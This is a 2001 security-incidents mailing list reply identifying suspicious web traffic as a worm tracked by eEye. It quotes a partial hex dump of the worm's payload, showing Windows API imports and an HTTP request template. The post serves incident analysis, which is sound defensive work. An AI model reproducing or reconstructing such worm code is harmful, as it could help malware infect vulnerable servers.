Security Incidents mailing list archives

Re: Strange web traffic


From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 17 Jul 2001 14:03:39 -0600 (MDT)

That is indeed a worm, though you're missing the first part of the
conversation.

This is the worm that Marc from eeye has been posting about; I saw a post
to incidents about it arrive shortly before this one, forwarded from
Aleph1.

                                                Ryan

On Tue, 17 Jul 2001, Scott Nursten wrote:

0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><



----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com